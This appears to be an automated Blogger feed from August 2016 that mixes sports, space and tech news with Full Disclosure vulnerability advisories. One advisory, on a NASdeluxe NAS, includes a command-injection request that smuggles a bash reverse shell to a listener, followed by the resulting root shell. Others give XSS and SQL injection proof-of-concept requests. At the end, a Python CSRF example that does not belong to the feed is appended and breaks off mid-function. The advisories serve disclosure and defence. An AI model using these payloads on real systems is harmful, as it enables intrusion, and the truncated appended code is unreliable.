Saturday, August 6, 2016

Tomatoes, finally some the birds didn't get


via Instagram http://ift.tt/2aC6KgQ

Cantata a voce sola di Contraldo con Flauto (Anonymous)

Composer, Anonymous. Movements/Sections, 3 movements. Year/Date of Composition, 1724. Language, Italian. Piece Style, Baroque.

from Google Alert - anonymous http://ift.tt/2aJD7uS
via IFTTT

MONUMENTO SIMÓN BOLÍVAR [Material gráfico] | Anonymous

Date: 1982; http://ift.tt/2arqOXy. Creation date: Period: 1982; 4 quarter of the 20th century; Time; Chronological period; Second millennium AD ...

from Google Alert - anonymous http://ift.tt/2aBw2fb
via IFTTT

Anonymous

Anonymous · wordpress-2 | 5th August 2016. A constant occurrence at my school (may I add, middle school) is the sexist standards brought to be ...

from Google Alert - anonymous http://ift.tt/2aBuX79
via IFTTT

Ravens: Despite Justin Tucker's claim he'd try 84.5-yd FG, ST coordinator Jerry Rosburg says "we have no plans for such" (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Anonymous

The latest broadcasts from Anonymous (@jellywisper) on Periscope. hacking and helping to hack.

from Google Alert - anonymous http://ift.tt/2aBkyZ7
via IFTTT

On This Day 25-years Ago, The World's First Website Went Online

On this day 25 years ago, August 6, 1991, the world's first website went live to the public from a lab in the Swiss Alps. So Happy 25th Birthday, WWW! It's the Silver Jubilee of the world's first website. The site was created by Sir Tim Berners-Lee, the father of the World Wide Web (WWW), and was dedicated to information on the World Wide Web project. The world's first website, which ran on


from The Hacker News http://ift.tt/2aB0lT1
via IFTTT

Iran Bans Pokémon GO — It's My Way or the Highway!

Pokémon GO has become the world’s most popular mobile game since its launch in July, but not everyone loves it. Pokémon GO has officially been banned in Iran. The Iranian High Council of Virtual Spaces – the country's official body that oversees online activity – has prohibited the use of the Pokémon GO app within the country due to unspecified "security concerns," BBC reports.


from The Hacker News http://ift.tt/2b0LF5J
via IFTTT

I have a new follower on Twitter


John R. Patterson
Customer Service Guru, Leadership Consultant, Office Construction & Relocation Expert, Best-selling Author, In-demand Speaker, Husband and Father of 5.
Atlanta, Georgia
http://t.co/mxTESELpDp
Following: 5270 - Followers: 7481

August 06, 2016 at 02:26AM via Twitter http://twitter.com/johnrpatt

I have a new follower on Twitter


Susan Cork
WordPress Designer and Front-End Developer.

https://t.co/GZvmvxh4vd
Following: 3307 - Followers: 3608

August 06, 2016 at 12:52AM via Twitter http://twitter.com/susancork

Apollo 15 Panorama


On July 31, 1971, Apollo 15 astronauts Jim Irwin and Dave Scott deployed the first Lunar Roving Vehicle on the Moon. Using it to explore their Hadley-Apennine landing site they spent nearly three days on the Moon while Al Worden orbited above. This digitally stitched panorama shows Scott examining a boulder on the slope of 3.5 kilometer high Mons Hadley Delta to the left of their electric-powered, four-wheel drive vehicle. The sun at his back, Irwin casts the strong shadow to the rover's right. The panoramic view extends farther right to the sunward direction, over Hadley Rille and lunar terrain, revealed in harsh, unfiltered sunlight. In total, the rover traversed 28 kilometers (17 miles) on the lunar surface. The Apollo 15 mission returned about 76 kilograms of moon rocks to planet Earth. via NASA http://ift.tt/2aXWG6w

Orioles Video: Pedro Alvarez crushes two 400-plus foot HR in 7-5 win over White Sox; has hit 6 HR in his last 5 games (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Friday, August 5, 2016

Cantata Non lasciarmi o bella speme (Anonymous)

Composer, Anonymous. Movements/Sections, 3 movements. Year/Date of Composition, 1730-1740. Language, Italian. Piece Style, Baroque.

from Google Alert - anonymous http://ift.tt/2aBsgWn
via IFTTT

I have a new follower on Twitter


McGuire Space llc



Following: 1 - Followers: 1

August 05, 2016 at 09:21PM via Twitter http://twitter.com/McGuireSpace

[FD] [SYSS-2016-063] VMware ESXi 6 - Improper Input Validation (CWE-20)

Source: Gmail -> IFTTT-> Blogger

Re: [FD] Multiple remote vulnerabilities (RCE, bof) in Nuuo NVR and NETGEAR Surveillance

On 04/08/16 17:46, Pedro Ribeiro wrote:
> tl;dr
>
> Lots of RCE, hardcoded credentials, stack buffer overflow and
> information disclosure in the Nuuo NVRmini and other network video
> recorders of the same vendor.
> These vulnerabilities also affect the NETGEAR Surveillance app (which
> can be installed on the NETGEAR ReadyNAS).
>
> See the full advisory including PoC and exploits below, or at my github
> (http://ift.tt/2aY9fg6).
>
> Metasploit modules have been submitted for vulns #1, #2 and #3:
> http://ift.tt/2aXHszf
> http://ift.tt/2aABQr2
> http://ift.tt/2aXHI1d
>
> Thanks to CERT/CC for helping me disclose these vulnerabilities - see
> http://ift.tt/2aABmRN for their advisory.
>
> Regards,
> Pedro
>
> ==============================
>
>>> Fix:
> NETGEAR and Nuuo did not respond to CERT/CC coordination efforts (see
> Timeline below), so no fix is available.
> Do not expose any of these devices to the Internet or any networks with
> untrusted hosts.
>
> Timeline:
> 28.02.2016: Disclosure to CERT/CC.
> 27.04.2016: Requested status update from CERT - they did not receive any
> response from vendors.
> 06.06.2016: Requested status update from CERT - still no response from
> vendors.
> Contacted Nuuo and NETGEAR directly. NETGEAR responded with
> their "Responsible Disclosure Guidelines", to which I did not agree and
> requested them to contact CERT if they want to know the details about
> the vulnerabilities found. No response from Nuuo.
> 13.06.2016: CERT sent an update saying that NETGEAR has received the
> details of the vulnerabilities, and they are attempting to contact Nuuo
> via alternative channels.
> 07.07.2016: CERT sent an update saying that they have not received any
> follow up from both Nuuo and NETGEAR, and that they are getting ready
> for disclosure.
> 17.07.2016: Sent an email to NETGEAR and Nuuo warning them that
> disclosure is imminent if CERT doesn't receive a response or status
> update. No response received.
> 01.08.2016: Sent an email to NETGEAR and Nuuo warning them that
> disclosure is imminent if CERT doesn't receive a response or status
> update. No response received.
> 04.08.2016: Coordinated disclosure with CERT.
>
>
>>> References:
> [1] http://ift.tt/2aABmRN
>
>
> ================
> Agile Information Security Limited
> http://ift.tt/1JewOIU
>>> Enabling secure digital business >>

Forgot to mention - these are actually "0 days" since the vendors didn't
bother to respond or issue fixes - see timeline above.

Regards,
Pedro

Source: Gmail -> IFTTT-> Blogger

[FD] Multiple remote vulnerabilities (RCE, bof) in Nuuo NVR and NETGEAR Surveillance

[FD] K2 (Joomla! Extension) < 2.7.1 - Reflected Cross Site Scripting

================================================================
K2 Joomla! Extension < 2.7.1 - Reflected Cross Site Scripting
================================================================
Information

Source: Gmail -> IFTTT-> Blogger

[FD] CVE-2016-6527 Possible Privilege Escalation in telecom of Samsung Mobile Phone

Hi,

Description of the potential vulnerability:
Severity: Medium
Affected versions: L(5.0/5.1), M(6.0)
Reported on: May 11, 2016
Disclosure status: Privately disclosed.
The vulnerability in SmartCall Activity components of Telecom application can make crash and reboot a device when the malformed serializable object is passed.
Fix: http://ift.tt/2aOZell
SVE-2016-6244: Possible Privilege Escalation in telecom

Sincerely,
Zhaozhanpeng(0xr0ot)

Source: Gmail -> IFTTT-> Blogger

CyberTipline Allows Anonymous Online Tips

If you think someone you know is possessing child pornography, there is a way to make an anonymous online tip. Several federal law enforcement ...

from Google Alert - anonymous http://ift.tt/2b9jRYW
via IFTTT

[FD] CVE-2016-6526 Possible Privilege Escalation in telecom of Samsung Mobile Phone

Description of the potential vulnerability:
Severity: Medium
Affected versions: L(5.0/5.1), M(6.0)
Reported on: May 11, 2016
Disclosure status: Privately disclosed.
A vulnerability in SpamCall Activity components of Telecom application can make crash and reboot a device when the malformed serializable object is passed.
Fix: http://ift.tt/2aOZell
SVE-2016-6242: Possible Privilege Escalation in telecom

Sincerely,
Zhaozhanpeng(0xr0ot)

Source: Gmail -> IFTTT-> Blogger

[FD] [SYSS-2016-065] NASdeluxe NDL-2400r: OS Command Injection

Advisory ID: SYSS-2016-065
Product: NASdeluxe NDL-2400r
Vendor: Starline Computer GmbH
Affected Version(s): 2.01.10
Tested Version(s): 2.01.09
Vulnerability Type: OS Command Injection (CWE-78)
Risk Level: High
Solution Status: no fix (product has reached EOL since 3 years)
Vendor Notification: 2016-07-04
Public Disclosure: 2016-08-03
CVE Reference: Not assigned
Author of Advisory: Klaus Eisentraut, SySS GmbH, http://ift.tt/1Nxy8d7

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The product "NASdeluxe NDL-2400r" [3] is vulnerable to OS Command Injection as root. No credentials are required to exploit this vulnerability.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details / Proof-of-Concept:

The language parameter in the web interface login request of the product "NASdeluxe NDL-2400r" is vulnerable to an OS Command Injection as root.

The SySS GmbH sent the following HTTPS request to the webinterface:

~~~~~
POST /usr/usrgetform.html?name=index HTTP/1.1
Host: 192.168.1.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

lang=||`bash+-i+>%26+/dev/tcp/192.168.1.2/443+0>%261`&username=&pwd=&site=web_disk&login_btn=Einloggen
~~~~~

After sending the request, a reverse shell connected back:

~~~~~
# nc -lvvp 443
Listening on any address 443 (https)
Connection from 192.168.1.1:49070
bash: no job control in this shell
bash-3.00# whoami
root
bash-3.00# cat /img/version
2.01.09
~~~~~

The tested firmware version was 2.01.09. The most current version is 2.01.10 according to the web page of the vendor [3]. However there are no hints of a security update in the release notes [4]. Thus, the SySS GmbH assumes that this vulnerability is likely also present in the most current firmware version from 2009-10-22.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The product has reached end-of-life (EOL) status since more than three years. Thus, no patch will be provided by the vendor.

It is highly recommended to migrate to one of the newer and still supported NAS solutions which are (according to Starline Computer GmbH) not affected by this vulnerability.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2016-06-29: Vulnerability discovered
2016-07-04: asked info@starline.de for contact person (no answer)
2016-07-22: sent this advisory to info@starline.de
2016-07-22: response from vendor: won't fix (product reached EOL >3 years)
2016-08-03: public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] SySS GmbH, SYSS-2016-065 http://ift.tt/2aAzgkW
[2] SySS GmbH, SySS Responsible Disclosure Policy http://ift.tt/2aSI35b
[3] NASdeluxe Homepage http://ift.tt/2avypSy
[4] NDL-2400R Firmware Release Notes http://ift.tt/2aXGF10

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Klaus Eisentraut of the SySS GmbH.

E-Mail: klaus.eisentraut@syss.de
Public Key: http://ift.tt/2avzidS
Key ID: 0xBAC677AE
Key Fingerprint: F5E8 E8E1 A414 4886 0A8B 0411 DAB0 4DB5 BAC6 77AE

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://ift.tt/HGsLr6

Source: Gmail -> IFTTT-> Blogger

[FD] D-Link NAS, DNS Series: Stored XSS via Unauthenticated SMB

Source: Gmail -> IFTTT-> Blogger

[FD] Kaspersky Safe Browser iOS Application - MITM SSL Certificate Vulnerability (CVE-2016-6231)

Source: Gmail -> IFTTT-> Blogger

Improvers Anonymous

An acting student stumbles his way into an addict support group meeting.

from Google Alert - anonymous http://ift.tt/2aZYqxp
via IFTTT

Food safe cookie cutters!


via Instagram http://ift.tt/2aV4LZd

Staying ahead of deadline


via Instagram http://ift.tt/2aZONxu

I have a new follower on Twitter


GrowthHIT
Growth on Demand. Hire an Elite Growth Team in 90 Seconds on https://t.co/l5dJik0NEK. #SEO #GrowthHacking #CRO #Startup #Launch #EmailMarketing #PPC
New York, NY
https://t.co/rruuhtBYVm
Following: 958 - Followers: 1782

August 05, 2016 at 03:36PM via Twitter http://twitter.com/GrowthHit

I have a new follower on Twitter


Webgrow UK
I'm A Family Man Who Loves Travel And Helping E-Commerce Owners Get More Sales & Conversions: Magento, PrestaShop and Woocommerce https://t.co/2HAu0koCk1
Aylesbury, UK
https://t.co/uDf4RFJint
Following: 3792 - Followers: 4349

August 05, 2016 at 03:36PM via Twitter http://twitter.com/webgrowuk

I have a new follower on Twitter


Kaymu
Kaymu is the #1 Online Shopping Community in Emerging Countries http://t.co/KYG3M5QCIC #Africa #Asia #Europe #Ecommerce #Marketplace

http://t.co/KYG3M68dQG
Following: 866 - Followers: 7626

August 05, 2016 at 03:36PM via Twitter http://twitter.com/KaymuGlobal

Ravens: Marshall Yanda is the top-rated guard in Madden NFL 17 with a 97 overall, 5 points ahead of Cowboys' Zack Martin (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

[FD] Ecwid Ecommerce Shopping Cart WordPress Plugin unauthenticated PHP Object injection vulnerability

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Scripting in Store Locator Plus for WordPress

Source: Gmail -> IFTTT-> Blogger

[FD] DLL side loading vulnerability in VMware Host Guest Client Redirector

Source: Gmail -> IFTTT-> Blogger

Allow anonymous event submitters to edit their own event

[resolved] Allow anonymous event submitters to edit their own event (2 posts). kimdebling. Member Posted 17 hours ago #. Hi,. I've set up my website ...

from Google Alert - anonymous http://ift.tt/2annhKb
via IFTTT

13 hour build, took over 30 minutes to slice


via Instagram http://ift.tt/2aA0ZDz

via Instagram http://ift.tt/2aniloY

ISS Daily Summary Report – 08/04/2016

Fluid Shifts Operations In the Service Module: With ground team assistance, crewmembers continued supporting Fluid Shifts Imaging exams that began yesterday by configuring the Optical Coherence Tomography (OCT) and the Distortion Product Otoacoustic Emission (DPOAE) hardware before completing a DPOAE test, OCT exam, and a Tonometry exam. The purpose of this investigation is to characterize the space flight-induced fluid shift, including intra- and extravascular shifts, intra- and extracellular shifts, changes in total body water and lower vs. upper body shifts. Noninvasive techniques are used to assess arterial and venous dimensions and flow parameters, ocular pressure and structure, and changes in intracranial pressure. Lower body negative pressure is being investigated for its ability to mitigate some of the effects of the space flight-induced fluid shift. Results from this investigation are expected to help define the causes of the ocular structure and vision changes associated with long duration space flight, and assist in the development of countermeasures.

NanoRacks External Platform (NREP) and Gumstix Installation: The NREP was prepared for installation on the Japanese Experiment Module (JEM) Airlock (JEMAL) Slide Table. During the NREP assembly, the NanoRacks-Gumstix experiment was installed onto the NREP. Two crewmembers installed NREP on JEMAL Slide Table. One crewmember held NREP in place to keep the capture cones aligned with the NREP receptacles and the other operated the capture mechanism. The Slide Table was then retracted from the JEM Pressurized Module (JPM) side into the JEMAL and the inner hatch was closed. The NanoRacks External Platform represents the first external commercial research capability for the testing of scientific investigations, sensors, and electronic components in space. The NanoRacks External Platform will be installed on a payload required basis on the outside of the ISS on the JEM External Facility (JEM-EF). The NanoRacks-Evaluation of Gumstix Performance in Low-Earth Orbit (NanoRacks-Gumstix) investigation tests small computers called Gumstix modules, which are based on open-source software, as an alternative off-the-shelf option for use in space. The investigation studies whether the Gumstix microprocessors can withstand the radiation environment on board the ISS. The NREP will be deployed from the JEMAL and installed on the JEM-EF tomorrow.

Multi-Omics Operations: The crew supported the Japan Aerospace Exploration Agency (JAXA) Multi-Omics investigation by collecting saliva samples and inserting them into a Box Module in the Minus Eighty-degree Freezer for ISS (MELFI). The investigation evaluates the impacts of space environment and prebiotics on astronauts’ immune function by combining the data obtained from the measurements of changes in the microbiological composition, metabolites profiles, and the immune system.

Space Headaches: The crew completed the European Space Agency (ESA) Space Headaches questionnaire to provide information that may help in the development of methods to alleviate associated symptoms and improvement in the well-being and performance of crew members in space. Headaches during space flight can negatively affect mental and physical capacities of crew members which can influence performance during a space mission.

Habitability Human Factors Directed Observations: The crew recorded and submitted a walk-through video documenting observations of life onboard ISS, providing insight related to human factors and habitability. The Habitability investigation collects observations about the relationship between crew members and their environment on the ISS. Observations can help spacecraft designers understand how much habitable volume is required, and whether a mission’s duration impacts how much space crew members need.

Extravehicular Activity (EVA) Tool Configuration: In preparation for the EVA currently planned for August 19, the crew gathered and configured required tools.

Today’s Planned Activities

All activities were completed unless otherwise noted.

Multi Omics (MO) Saliva Sample Collection Multi Omics (MO) MELFI Sample Insertion Multi Omics (MO) Equipment Stowage Multi Omics (MO) Questionnaire Completion Window Shutter Close FLUID SHIFTS. Comm configuration for the experiment / r/g 9995 CASKAD. Manual Mixing in Bioreactor / r/g 2888 Acoustic Dosimeter Setup Day 3 FLUID SHIFTS. Gathering and Connecting Equipment for TV coverage OTKLIK. Equipment Check / r/g 1588 FLUID SHIFTS. Big Picture Words Review Verification of ИП-1 Flow Sensor Position BRI log download from RSS1 VIBROLAB. Monitoring hardware activation / r/g 2981 FLUID SHIFTS. Connecting OCT Laptop to RS BRI and HRF PC to ППС-26 (instead of RSE-Med) r/g 2983 FLUID SHIFTS. OCT Power up in SM FLUID SHIFTS. CCFP Activation and Settings Adjustments in RS СОЖ Maintenance US EVA Tool Preparation FLUID SHIFTS. DPOAE Setup in SM NREP. NANORACKS External Platform Assembly FLUID SHIFTS. TONO Hardware setup in SM FLUID SHIFTS. Chibis Setup / r/g 2982 FLUID SHIFTS. Operator Assistance with Chibis and Gamma-1 r/g 2982 FLUID SHIFTS. Gathering Data in SM EVA Tool Config Vacuum cleaning of ВТ7 screens on ГЖТ4 behind FGB panel 108 FLUID SHIFTS. Copying Data from CCFP/DPOAE devices and their deactivation in RS FLUID SHIFTS. Chibis Closeout Ops / r/g 2982 FLUID SHIFTS. Crew Onboard Support System (КСПЭ) Hardware Deactivation and Closing Application FLUID SHIFTS. TONO SM Stowage FLUID SHIFTS. OCT Power off in SM FLUID SHIFTS. Restore nominal comm config FLUID SHIFTS. Disconnecting of Laptop OCT, HRF and connecting RSE-Med r/g 2984 FLUID SHIFTS. Disconnecting US converter from СУБА / r/g 2984 Measuring SM interior panel elements / r/g 2991 JEMAL Slide Table (ST) Extension to JPM Side NREP. Mounting Slide Table NREP. Assistance in Mounting Slide Table JEMAL JEM Airlock Slide Table Retraction from JPM JEMAL Depress and Vent PAO Hardware Setup Crew Prep for PAO PAO Event Progress 433 (DC1) Transfers and IMS Ops / Progress 433 Transfers + r/g 2834, 2835, 2929, 2961 FLUID SHIFTS. OCT Hardware Stowage EHS CFM In-flight Microbiology Water Analysis FLUID SHIFTS. CCFP/PC Stowage VIBROLAB Copy and Downlink Data / r/g 2981 DRAGON. Transfers Re-Packing fasteners into fasteners and tool kit delivered on Progress 433 / r/g 2990 FLUID SHIFTS. Hardware Gathering before Transfer to USOS FLUID SHIFTS Hardware setup to work with Dilution Measures Setup FLUID SHIFTS. Hardware Transfer to USOS FLUID SHIFTS. Cable removal BLB Rotor Inspection FLUID SHIFTS. OCT and Laptop Setup Removal/Installation of Signal Converter Unit (БПС) devices in TORU work station r/g 2992 Dragon Cargo Operations Conference FLUID SHIFTS. Ultrasound 2 Setup and Activation Demate telemetry […]

from ISS On-Orbit Status Report http://ift.tt/2azWSaD
via IFTTT

This ATM Hack Allows Crooks to Steal Money From Chip-and-Pin Cards

Forget about security! It turns out that the Chip-and-PIN cards are just as easy to clone as magnetic stripe cards. It took researchers just a simple chip and pin hack to withdraw up to $50,000 in cash from an ATM in America in under 15 minutes. We have been told that EMV (Europay, MasterCard and Visa) chip-equipped cards provide an extra layer of security which makes these cards more secure


from The Hacker News http://ift.tt/2azMWAP
via IFTTT

Torrentz.eu Shuts Down Forever! End of Biggest Torrent Search Engine

Over two weeks after the shutdown of Kickass Torrents and arrest of its admin in Poland, the world's biggest BitTorrent meta-search engine Torrentz.eu has apparently shut down its operation. The surprise shutdown of Torrentz marks the end of an era. Torrentz.eu was a free, fast and powerful meta-search engine that hosted no torrents of its own, but combined results from


from The Hacker News http://ift.tt/2aJ3D8h
via IFTTT

Hack Apple & Get Paid up to $200,000 Bug Bounty Reward

So finally, Apple will pay you for your efforts of finding bugs in its products. While major technology companies, including Microsoft, Facebook and Google, have launched bug bounty programs over last few years to reward researchers and hackers who report vulnerabilities in their products, Apple remained a holdout. But, not now. On Thursday, Apple announced at the Black Hat security


from The Hacker News http://ift.tt/2aCAs91
via IFTTT

[FD] FortiCloud - (Reports Summary) Multiple Persistent Vulnerabilities

Document Title:
===============
FortiCloud - (Reports Summary) Multiple Persistent Vulnerabilities

References (Source):
====================
http://ift.tt/2aW1Lfo

Release Date:
=============
2016-08-05

Vulnerability Laboratory ID (VL-ID):
====================================
1735

Common Vulnerability Scoring System:
====================================
3.6

Product & Service Introduction:
===============================
FortiCloud is a hosted solution that helps you manage your FortiGate® network and your FortiAP® wireless infrastructure. The perfect companion to all your FortiGate & FortiWiFi units. FortiCloud is a hosted security and wireless infrastructure management solution and log retention service for FortiGate, FortiWiFi and FortiAP devices. It gives you centralized reporting, traffic analysis, configuration management, and log retention without the need for additional hardware and software, with the following feature set:

( Copy of the Vendor Homepage: http://ift.tt/2aW2nlu )

Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered multiple application-side validation vulnerabilities in the official Forticloud online service web-application.

Vulnerability Disclosure Timeline:
==================================
2016-02-17: Researcher Notification & Coordination (Lawrence Amer)
2016-02-18: Vendor Notification (Fortguard PSIRT Security Team)
2016-03-02: Vendor Response/Feedback (Fortguard PSIRT Security Team)
2016-07-04: Vendor Fix/Patch (Fortinet Developer Team)
2016-07-22: Security Acknowledgements (Fortguard PSIRT Security Team)
2016-08-05: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
Multiple persistent cross site scripting web vulnerabilities has been discovered in the official version of Forticloud online service web-application. The security vulnerability allows remote attackers to inject own malicious script codes on the application-side of the affected online service module.

The persistent input validation web vulnerabilities are located in the `Template - Summary` module of the main `Reports` module. The encoding of the add inputs in the title, description and charts is broken. Remote attackers with low or privileged web-application user accounts are able to inject own malicious script codes on the application-side of the reports - summary module. The request method to inject is POST and the attack vector is located on the application-side of the forticloud service. The injection point are the title, description and charts add input fields and the execution point is the reports - summary module of the web-application.

The security risk of the persistent validation vulnerabilities are estimated as medium with a cvss (common vulnerability scoring system) count of 3.6. Exploitation of the persistent input validation web vulnerability requires a low privileged web-application user account and low or medium user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects to malicious source and persistent manipulation of affected or connected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] FortiCloud - Reports - Templates

Vulnerable Input(s):
[+] Reports Main title
[+] Reports Descriptions
[+] Report Charts

Vulnerable Parameter(s):
[+] ext-gen2538, ext-gen2458 & gwt-HTML
[+] fc-rpt-description
[+] fc-rpt-title
[+] fc-rpt-chart

Affected Module(s):
[+] Summary (Main.html - Index)

Proof of Concept (PoC):
=======================
The application-side web vulnerabilities can be exploited by remote attackers with low privileged application user account and low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Open the forticloud appliance web-application and login
2. Open the reports > templates module
3. Switch to Summary Reports
4. Edit existing or Add a new own title , description or chart
5. Inject as name value a script code payload (javascript)

Note: >"
%20%20[PERSISTENT SCRIPT CODE EXECUTION!]

[FD] Subrion v4.0.5 CMS - SQL Injection Vulnerability

Document Title:
===============
Subrion v4.0.5 CMS - SQL Injection Vulnerability

References (Source):
====================
http://ift.tt/2azBfYj

Release Date:
=============
2016-08-04

Vulnerability Laboratory ID (VL-ID):
====================================
1893

Common Vulnerability Scoring System:
====================================
7

Product & Service Introduction:
===============================
Subrion is a full featured open source CMS written in PHP 5 & MySQL with many options. Here is the list of the most important features. You don't need to pay a single penny to start using Subrion CMS. It's not encrypted in any way so you can customize it per your needs. It's done to focus on the content management process. Start it hassle-free within just a few minutes and take care of the content.

(Copy of the Vendor Homepage: http://ift.tt/2a45l6h )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a remote sql-injection vulnerability in the Subrion v4.0.5 content management system.

Vulnerability Disclosure Timeline:
==================================
2016-08-04: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Intelliants LLC
Product: Subrion - Content Management System (Web-Application) 4.0.5

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
A remote sql-injection web vulnerability has been discovered in the Subrion v4.0.5 content management system. The vulnerability allows remote attackers to execute own malicious sql commands to compromise the application or dbms.

The sql-injection vulnerability is located in the `query` and `show_query` parameters of the `.database/sql/` module POST method request. Remote attackers are able to execute own sql commands by usage of the insecure sql management tool request. The attack vector of the vulnerability is application-side and the request method to inject is POST.

The security risk of the sql-injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.0. Exploitation of the remote sql injection web vulnerability requires no user interaction and a low privileged web-application user account. Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] ./database/sql/

Vulnerable Parameter(s):
[+] show_query
[+] query

Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers with privileged web-application user account and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Exploitation
POST /admin/database/sql/ HTTP/1.1
Host: http://ift.tt/2aISjci

query=[SQL-INJECTION VULNERABILITY!]&show_query=[SQL-INJECTION VULNERABILITY!]&exec_query=Go

Source: Gmail -> IFTTT-> Blogger

[FD] Typesettercms v5.0.1 - (Delete Files) CSRF Vulnerability

Document Title:
===============
Typesettercms v5.0.1 - (Delete Files) CSRF Vulnerability

References (Source):
====================
http://ift.tt/2arOadi

Release Date:
=============
2016-08-03

Vulnerability Laboratory ID (VL-ID):
====================================
1889

Common Vulnerability Scoring System:
====================================
3

Product & Service Introduction:
===============================
Typesetter is an open source CMS written in PHP focused on ease of use with True WYSIWYG editing and flat-file storage. Typesetter CMS, A Free and Easy CMS for everyone.

(Copy of the Vendor Homepage: http://ift.tt/1qgPgz7 )

Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a cross site request forgery vulnerability in the official Typesettercms v5.0.1 web-application.

Vulnerability Disclosure Timeline:
==================================
2016-08-03: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Typesetter
Product: Typesettercms - Content Management System (Open Source) 5.0.1

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A cross site request forgery web vulnerability has been discovered in the official Typesettercms v5.0.1 web-application. The issue allows remote attackers to manipulate requests from the client-side browser to the web-application and execute service functions via non-expired session credentials.

The cross site request forgery vulnerability is located in the cms `file` parameter of the `extra` module POST method request. In the absence of a security token, an attacker can execute arbitrary code against an administrator account to permanently delete the pages of the website via the panel. The issue becomes more critical because the application has no checkbox to confirm the deletion of a page.

The security risk of the client-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.0. Exploitation of the non-persistent web vulnerability requires no privileged web application user account and low or medium user interaction. Successful exploitation of the vulnerability results in execution of the page delete function without secure approval or validation.

Proof of Concept (PoC):
=======================
The csrf web vulnerability can be exploited by remote attackers without a privileged web-application user account and with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Exploitation

Reference(s):
http://localhost:8080/
http://localhost:8080/Admin/
http://localhost:8080/Admin/Extra
http://localhost:8080/Admin/Extra?cmd=
http://localhost:8080/Admin/Extra?cmd=DeleteArea
http://localhost:8080/Admin/Extra?cmd=DeleteArea&file=

Security Risk:
==============
The security risk of the client-side cross site request forgery web vulnerability in the file parameter of the extra module is estimated as medium. (CVSS 3.0)

Credits & Authors:
==================
ZwX - (http://zwx.fr) [ http://ift.tt/1OEBOwM ]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

Source: Gmail -> IFTTT-> Blogger
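
The control the advisory reports as missing, a security token on the state-changing `DeleteArea` request, shown next to the unprotected behaviour as an added example (not Typesetter's code and not part of the advisory). The request model, the `csrf_token` field name, the session ids and the page names are assumptions constructed for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

SERVER_KEY = secrets.token_bytes(32)        # per-deployment secret (constructed)
TRUSTED_ORIGIN = "http://localhost:8080"    # host used in the advisory's references
STATE_CHANGING = {"DeleteArea"}             # command named in the advisory
SESSIONS = {"s-admin", "s-other"}           # constructed logged-in sessions


def issue_token(session_id):
    """Anti-CSRF token bound to one session: HMAC-SHA256(server key, session id)."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def token_ok(session_id, token):
    """Constant-time comparison; a missing token never matches."""
    expected = issue_token(session_id).encode()
    return hmac.compare_digest(expected, (token or "").encode())


def params_of(req):
    """Merge query-string and form fields into one parameter view."""
    query = parse_qs(urlsplit(req["url"]).query)
    merged = {key: values[0] for key, values in query.items()}
    merged.update(req["form"])
    return merged


def handle_unprotected(req, pages):
    """Behaviour described in the advisory: the session alone authorises the delete."""
    p = params_of(req)
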